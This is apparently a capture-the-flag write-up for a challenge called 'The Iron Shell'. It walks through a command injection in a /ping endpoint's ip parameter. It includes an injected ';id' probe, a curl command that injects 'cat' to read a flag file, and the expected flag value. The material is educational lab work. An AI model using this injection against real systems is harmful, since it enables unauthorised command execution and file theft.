The Iron Shell - TOKEN1

Base URL: http://target:8000

Background

The /ping endpoint shells out to ping using the ip parameter without proper sanitization, enabling command injection.

From Nothing to Working

Start point: the challenge note only says there is an entry point at /ping.

Iterations:

1. Hit /ping directly to confirm the endpoint exists and responds.
2. Supply a normal IP value to confirm it performs a ping.
3. Append ;id to ip= to verify command injection and observe uid=1000(user).
4. Use the same injection to read the flag file with cat, which returns the token.

Goal

Exploit the /ping command injection to read the flag.

Command

curl -s "http://target:8000/ping?ip=127.0.0.1;cat+/home/user/flag1.txt"

Expected Output

Look for:

PCCC{flag1_CC_7380}

Learn More

• https://owasp.org/www-community/attacks/Command_Injection
• https://cwe.mitre.org/data/definitions/78.html